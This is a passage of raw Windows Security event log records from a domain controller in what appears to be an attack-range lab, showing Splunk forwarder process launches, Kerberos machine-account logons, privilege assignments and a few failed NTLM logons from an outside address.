Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:43:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264886
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf74
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:43:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264887
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16a8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:43:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264889
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe74
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:43:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264888
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf5c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:43:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264892
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x887D77
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:43:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264891
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x887D77
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53802
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:43:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264890
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x887D77
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:44:01 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264894
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: POSTGRES
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 193.169.255.32
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:01 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264893
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: EXAM
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 193.169.255.32
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:02 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264895
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: WINADMIN
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 193.169.255.32
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264896
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1450
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264909
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1748
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264908
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x888934
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264907
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x888A22
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264906
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x888A6A
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264905
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x888B1F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53807
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264904
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x888B1F
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264903
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf60
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264902
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x888A6A
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 53806
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264901
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x888A6A
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264900
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x888A22
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264899
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x888A22
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264898
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x888934
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53805
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264897
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x888934
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:44:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264910
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
